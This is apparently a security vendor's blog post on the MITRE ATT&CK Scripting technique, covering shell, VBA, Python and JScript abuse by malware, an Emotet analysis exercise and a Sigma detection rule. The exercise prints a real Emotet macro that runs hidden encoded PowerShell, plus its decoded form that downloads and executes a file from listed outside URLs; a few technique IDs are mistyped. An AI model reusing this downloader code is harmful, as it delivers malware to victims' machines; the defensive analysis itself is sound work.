MITRE ATT&CK T1064 Scripting

In 2019, Picus Labs analyzed 48813 malware to determine tactics, techniques, and procedures (TTPs) used by adversaries in these malicious files. Picus Labs categorized each observed TTP by utilizing the MITRE ATT&CK® framework. As a result of the present research, 445018 TTPs observed in the last year were mapped to ATT&CK to identify the top 10 most common techniques used by attackers. Our research has found that Scripting was the sixth most prevalent ATT&CK technique used by adversaries in their malware. 

A script is a set of codes written in a scripting language such as AppleScript, PowerShell, Python, Unix Shells (bash, sh and others), VBScript, and JavaScript/JScript. Legitimate users like system administrators and programmers use scripting to accelerate operational tasks by automating them in scripts. Adversaries also use scripts to automate multiple actions. Our research has found that Scripting was the sixth most prevalent ATT&CK technique used by adversaries in their malware.

Introduction

A script is an ordered set of commands written in a scripting language.  A scripting language is an interpreted programming language that executes scripts without compiling. Not only legitimate users but also adversaries use Scripting to automate long tasks and execute codes that include multiple actions. Some scripting languages like PowerShell and VBScript in Windows systems and Unix shells in Unix based systems and AppleScript in macOS can interact directly with the operating system at an API, so they can be used by adversaries to bypass weak process monitoring mechanisms.

In this article, we review:

  • the fundamentals of the Scripting technique
  • updates on the technique in the new version of the ATT&CK framework
  • sub-techniques derived from the Scripting technique 
  • its use cases by threat actors and malware
  • red and blue team exercises for this technique

Changes in the New Version of the MITRE ATT&CK Framework

The July 2020 (v7) ATT&CK release is the first non-beta release of Enterprise ATT&CK represented with sub-techniques [1]. MITRE ATT&CK Sub-techniques are a way to describe a specific implementation of a technique in more detail. 

In the new sub-technique version of the MITRE ATT&CK Framework, the T1064 Scripting technique is deprecated. However, it was not completely removed in the new version. The Scripting technique is split into separate T1059.004 Unix Shell, T1059.005 Visual Basic, T1059.006 Python, and T1059.007 JavaScript/Jscript sub-techniques of T1059 Command and Scripting Interpreter.

Command and Scripting Interpreter Sub-techniques

The first three sub-techniques of the Command and Scripting Interpreter technique, T1059.001 PowerShell, T1059.002 AppleScript, and T1059.003 Windows Command Shell, were explained in our Command-Line Interface blog post. Command Line Interface was the sixth most prevalent ATT&CK technique according to our 10 Critical ATT&CK Technique research. Although these three techniques are also scripting languages, they were not included in the Scripting technique of the previous ATT&CK version, since they were stand-alone techniques. 

In this blog post, we describe four other sub-techniques that are derived from the Scripting technique.

  1. T1059.004 Unix Shell

    Unix shell is the primary command-line interpreter that provides a command-line interface (CLI) for Unix based operating systems (OS) such as macOS, Linux, and BSD. The Bourne Shell (sh), Bourne-Again Shell (bash), Z Shell (zsh), Korn Shell (ksh), and Secure Shell (SSH) are the most commonly used Unix shells. 

    In addition to an interactive CLI, The Unix shell also provides a scripting language to control the execution of the OS using shell scripts. Basically, a shell script is a set of commands that are in the execution order. The Unix shell can control any part of the system and support typical programming concepts such as conditional tests, loops, file operations, variables, and functions.

    Since Unix shells are powerful and flexible tools that execute commands and control the system, adversaries use Unix shells to execute various commands and malicious payloads. Moreover, they control remote systems with SSH during the lateral movement and command and control phases. Some use cases of Unix shells in malware:

    • to execute multiple commands on victims:
      • macOS Bundlore adware [2], Derusbi malware [3], Linux/Exaramel backdoor [4]
    • to create a reverse shell:
      • CallMe OSX Trojan [5], Chaos backdoor [6], Cointicker macOS cryptocurrency ticker [7]
    • to start/stop OS services and installed applications:
      • LoudMiner cross-platform cryptocurrency miner [8], WindTail OSX backdoor [9]
    • download additional payloads:
      • Shlayer macOS malware [9], [10], Skidmap cryptocurrency miner [11]
  2. T1059.005 Visual Basic
    • Visual Basic for Applications (VBA): VBA is an implementation of the Visual Basic language that provides process automation, Windows API access, and other low-level functionality through DLLs. Including Office for macOS, it is included in most Microsoft Office applications. As a common malicious usage scenario, adversaries embed their malicious codes in VBA macros in Microsoft Office files, then sends these malicious files as email attachments to victims (MITRE ATT&CK T166.001 Spearphishing Attachment)
    • VBScript (Microsoft Visual Basic Scripting Edition): VBScript is a derivative of Visual Basic that enables the user to control many aspects of the system by using COM. Although VBScript  initially targeted web developers by providing web client scripting in Internet Explorer and web server scripting in IIS, it gained support from Windows system administrators and adversaries because of its extensive functionality. For example, in a malware campaign revealed in March 2020, an obfuscated VBScript package was used to drop various malware such as Zloader, Ursnif, Qakbot, and Dridex [16]. The initial access vector is an email that contains a zipped VBScript file (.vbs) that appeared to be an invoice.
  3. T1059.006 Python

    Python is a popular high-level interpreted programming language. Since Python interpreters are available for the most of the operating systems and it has a comprehensive standard library that can perform many functions, adversaries use Python to execute commands, download payloads and perform various malicious behaviors. Threat actors create not only malware but also vulnerability exploit tools with Python.

    Python can be executed in multiple ways:

    • interactively from the command-line interface (CLI)
    • via Python scripts (.py)
    • via binary executables created by compilation of Python code

    One of the most recent Python-based malware is the PoetRAT remote access trojan (RAT) [17]. Briefly, it uses a Word document that contains a VBA script to drop a ZIP file. Then, the VBA macro unzips the zip file and executes the PoetRAT, which is a Python script. The zip file also contains a Python interpreter because Windows has no default Python interpreter.

  4. T1059.006 JavaScript/JScript

    JavaScript (JS) is a high-level ad multi-paradigm programming language that supports event-driven, functional, and imperative programming styles. JavaScript conforms to the ECMAScript specification, which is a standard for the interoperability of Web pages across different browsers. In fact, ECMAScript is the official name of the JavaScript language [18]. Jscript is Microsoft’s implementation of the ECMAScript language specification [19]. It is an interpreted scripting language as most of the scripting languages.

    In most cases, adversaries use JScript to develop droppers/downloaders to install/download the actual malware [20], [21]. They use heavy obfuscation methods on .js files that can evade static AV signatures [20], [21]. In some cases, adversaries use VBA and JScript together in their malware like TrickBot [22].

Red and Blue Team Exercises

Red Teaming - How to simulate?

In this exercise, we explain a real VBA code that was used by Emotet malware. We analyzed this payload in our following blog posts: 

This payload was included in the following Word document:

MD5: 515f13034bc4ccf635b026722fd5ef9c
SHA-1: 8925b822e1d86d787b4682d1bb803cf1f5ea7031
SHA-256: FF76FF1440947E3DD42578F534B91FDB8229C1F40FED36A3DD5688DBC51F0014


Researchers identified Emotet for the first time in 2014 as a banking malware stealing sensitive and private information. Now, adversaries are using Emotet as Infrastructure as a Service (IaaS) for delivering malware, including other banking Trojans. Emotet incorporated various obfuscation and evasion techniques to avoid detection in its payload.

Briefly, the VBA code embedded in the Word document executes an encoded PowerShell command using WMI, then the PowerShell code downloads a second payload of Emotet. Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems [23].

Do While GetObject(winmgmtS:win32_Process).Create("Powershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeABwAGcAeQB2AGUAJwA7ACQARQBrAHgAaABsAG8AYgBxAHIAbABoAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAG4AeQBqAHQAaABjAHIAegBqAG8AeQB2ACsAJwAuAGUAeABlACcAOwAkAFMAYgByAHkAcAB5AHcAeABnAGMAaQB0AGYAPQAnAFcAcABhAHcAeQBiAGkAcQBtAGoAJwA7ACQASABpAHIAbQB5AGgAcQBhAGwAdABvAHMAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBlAEIAQwBMAGkARQBuAFQAOwAkAFIAeABiAHkAdwBpAGMAaQA9ACcAaAB0AHQAcAA6AC8ALwBhAGgAYwAuAG0AcgBiAGQAZQB2AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBxAHAAMAAvACoAaAB0AHQAcAA6AC8ALwBlAC0AdAB3AG8AdwAuAGIAZQAvAHYAZQByAGQAZQAvAGkAbgA2AGsALwAqAGgAdAB0AHAAcwA6AC8ALwBtAGEAZwBuAGkAZgBpAGMAZQBuAHQAcABhAGsAaQBzAHQAYQBuAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBoAGEANQBqADAAYgAxAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBxAHcAcQBvAG8ALgBjAG8AbQAvAGgAbwBtAGwAZAB3AC8AMwBwAGkAeQB5ADQALwAqAGgAdAB0AHAAOgAvAC8AcwBpAHcAYQBrAHUAcABvAHMAbwAuAGMAbwBtAC8AcwBpAHcAYQBrAHUAMgAvAFgANQB6AEIAMABlAHkALwAnAC4AIgBzAHAATABgAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE4AdQBvAGwAdAB3AGYAcQBoAD0AJwBRAHIAdgBvAGgAZABpAHUAYgBmAGUAawAnADsAZgBvAHIAZQBhAGMAaAAoACQATgBkAGwAdQBhAGwAdQB2ACAAaQBuACAAJABSAHgAYgB5AHcAaQBjAGkAKQB7AHQAcgB5AHsAJABIAGkAcgBtAHkAaABxAGEAbAB0AG8AcwAuACIARABvAHcAYABOAGwAbwBhAGQAZgBpAGAATABFACIAKAAkAE4AZABsAHUAYQBsAHUAdgAsACAAJABFAGsAeABoAGwAbwBiAHEAcgBsAGgAKQA7ACQASABrAHUAawBrAGYAbwBwAHQAagBkAHIAPQAnAFgAYQBiAGQAeAB2AGsAZgBjAG0AYQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEUAawB4AGgAbABvAGIAcQByAGwAaAApAC4AIgBMAGAAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA5ADkAMwA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgB0ACIAKAAkAEUAawB4AGgAbABvAGIAcQByAGwAaAApADsAJABZAHoAagBqAGYAcABsAG0AawBnAHgAPQAnAEIAeABsAGsAcQBtAHQAeABhACcAOwBiAHIAZQBhAGsAOwAkAE0AbwBsAGMAaABpAGoAeAA9ACcAUQB1AGEAdABsAGIAZABsAHEAdgBmAGQAcAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABSAGMAawBhAGoAcgB4AHYAaQA9ACcARQBqAGUAYwB3AGEAcgBnAGsAYwBsACcA","",GetObject("winmgmtS:win32_ProcessStartuP"),"")

Loop

Let’s split and analyze the command:

  • Do While GetObject(winmgmtS:win32_Process).Create(): In the Do While loop, the Create method of the WMI’s Win32_Process class is used to create a new process. The first variable of this method is the CommandLine code to execute, which is a PowerShell command in this code.
  • Powershell -w hidden: There is not a parameter named -w according to the official PowerShell documentation [24]. In fact, the -w parameter is completed by PowerShell as the -WindowStyle parameter because of the parameter substring completion feature of PowerShell. Adversaries commonly use the -WindowStyle parameter with Hidden value in malicious PowerShell commands to avoid detection.
  • -en: Similar to -w, there is not a parameter named -en, according to the official PowerShell documentation [24]. The -en parameter is completed as -EncodedCommand parameter by PowerShell. -EncodedCommand accepts a base-64-encoded string version of a command. Therefore, we must use base64 decoding to reveal the PowerShell command. 

We’ll get the following code after base64 decoding, removing garbage variables, backtick (`), and plus (+) characters, and putting values of variables and beautifying the code. You can read the details of these de-obfuscation process in our blog post [25].

$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakistan.com/wp-includes/ha5j0b1/','https://www.qwqoo.com/homldw/3piyy4/','http://siwakuposo.com/siwaku2/X5zB0ey/')

foreach($url in $list){try{&('new-object') Net.WebClient.DownloadFile"($url, $env:userprofile\937.exe);

If ((&('Get-Item') $env:userprofile\937.exe)."Length" -ge 29936) {[Diagnostics.Process]::"Start"($env:userprofile\937.exe);

break;}}
catch{}}

Briefly, this code tries to download a file from the URLS included in the $list array in the given order via the Net.WebClient.DownloadFile method and saves the downloaded file to the $env:userprofile directory as 937.exe.

In conclusion, the VBA code given in this exercise incorporates following MITRE ATT&CK techniques:

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1047 Windows Management Instrumentation
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1564.003 Hide Artifacts: Hidden Window
  • T102 Obfuscated Files or Information

Blue Teaming - How to detect?

The following Sigma rule can be used to detect WMI DLLs loaded via VBA Macros in Word, Excel, PowerPoint and Outlook files:

title: Windows Mangement Instrumentation DLL Loaded Via Microsoft Word
id: a457f232-7df9-491d-898f-b5aabd2cbe2f
status: experimental
description: Detects DLL's Loaded Via Word Containing VBA Macros Executing WMI Commands
author: Michael R. (@nahamike01)
date: 2019/12/26
tags:
    - attack.execution
    - attack.t1047

    - attack.t1059.005
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image:
            - '*\winword.exe'
            - '*\powerpnt.exe'
            - '*\excel.exe'
            - '*\outlook.exe'
        ImageLoaded:
            - '*\wmiutils.dll'
            - '*\wbemcomn.dll'
            - '*\wbemprox.dll'
            - '*\wbemdisp.dll'
            - '*\wbemsvc.dll'
    condition: selection
falsepositives:
    - Possible. Requires further testing.
level: high

References

[1] “Updates - July 2020.” [Online]. Available: https://attack.mitre.org/resources/updates/updates-july-2020/. [Accessed: 10-Aug-2020]

[2] O. Sushko, “macOS Bundlore: Mac Virus Bypassing macOS Security Features,” 17-Apr-2019. [Online]. Available: https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis. [Accessed: 11-Aug-2020]

[3] “Website.” [Online]. Available: https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf. [Accessed: 11-Aug-2020]

[4] “New TeleBots backdoor: First evidence linking Industroyer to NotPetya,” 11-Oct-2018. [Online]. Available: https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/. [Accessed: 11-Aug-2020]

[5] R. Falcone and J. Miller-Osborn, “Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists,” 24-Jan-2016. [Online]. Available: https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/. [Accessed: 11-Aug-2020]

[6] S. Feldmann, “Chaos: a Stolen Backdoor Rising Again,” 14-Feb-2018. [Online]. Available: https://www.gosecure.net/blog/2018/02/14/chaos-a-stolen-backdoor-rising/. [Accessed: 11-Aug-2020]

[7] T. Reed, “Mac cryptocurrency ticker app installs backdoors,” 29-Oct-2018. [Online]. Available: https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/. [Accessed: 11-Aug-2020]

[8] “LoudMiner: Cross‑platform mining in cracked VST software,” 20-Jun-2019. [Online]. Available: https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/. [Accessed: 11-Aug-2020]

[9] “Middle East Cyber-Espionage.” [Online]. Available: https://objective-see.com/blog/blog_0x3B.html. [Accessed: 11-Aug-2020]

[10] “TAU Threat Intelligence Notification: New macOS Malware Variant of Shlayer (OSX) Discovered,” 12-Feb-2019. [Online]. Available: https://www.carbonblack.com/blog/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/. [Accessed: 11-Aug-2020]

[11] T. Micro, “Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload,” 16-Sep-2019. [Online]. Available: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/. [Accessed: 11-Aug-2020]

[12] mcleanbyron, “The Component Object Model.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/com/the-component-object-model. [Accessed: 11-Aug-2020]

[13] “The Windows Native API - TechNet Articles - United States (English) - TechNet Wiki.” [Online]. Available: https://social.technet.microsoft.com/wiki/contents/articles/11831.the-windows-native-api.aspx. [Accessed: 11-Aug-2020]

[14] “Inter-Process Communication: Component Object Model.” [Online]. Available: https://attack.mitre.org/techniques/T1559/001/. [Accessed: 11-Aug-2020]

[15] “Native API.” [Online]. Available: https://attack.mitre.org/techniques/T1106/. [Accessed: 11-Aug-2020]

[16] blubracket, “Obfuscated VBScript Drops Zloader, Ursnif, Qakbot, Dridex - Security Boulevard,” 24-Jun-2020. [Online]. Available: https://securityboulevard.com/2020/06/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex/. [Accessed: 11-Aug-2020]

[17] W. Mercer, “PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors.” [Online]. Available: http://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html. [Accessed: 12-Aug-2020]

[18] “JavaScript Versions.” [Online]. Available: https://www.w3schools.com/js/js_versions.asp. [Accessed: 12-Aug-2020]

[19] “JScript (ECMAScript3).” [Online]. Available: https://docs.microsoft.com/en-us/previous-versions/hbxc2t98(v=vs.85). [Accessed: 12-Aug-2020]

[20] “Undetected JScript Dropper Installs Sage Ransomware,” 20-Apr-2017. [Online]. Available: https://www.vmray.com/cyber-security-blog/undetected-jscript-dropper-executes-sage-ransomware/. [Accessed: 12-Aug-2020]

[21] “[No title].” [Online]. Available: https://file.gdatasoftware.com/web/en/documents/whitepaper/G_DATA_Analysis_Script.Trojan-Downloader.Fodevepdf.A.pdf. [Accessed: 12-Aug-2020]

[22] “Deobfuscating Ostap: TrickBot’s 34,000 Line JavaScript Downloader,” 03-Sep-2019. [Online]. Available: https://threatresearch.ext.hp.com/deobfuscating-ostap-trickbots-javascript-downloader/. [Accessed: 12-Aug-2020]

[23] stevewhims, “Windows Management Instrumentation.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page. [Accessed: 11-Aug-2020]

[24] SteveL-MSFT, “about_PowerShell_exe - PowerShell.” [Online]. Available: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe. [Accessed: 11-Aug-2020]

[25] S. Özarslan, “Emotet Technical Analysis - Part 2 PowerShell Unveiled.” [Online]. Available: https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled. [Accessed: 12-Aug-2020]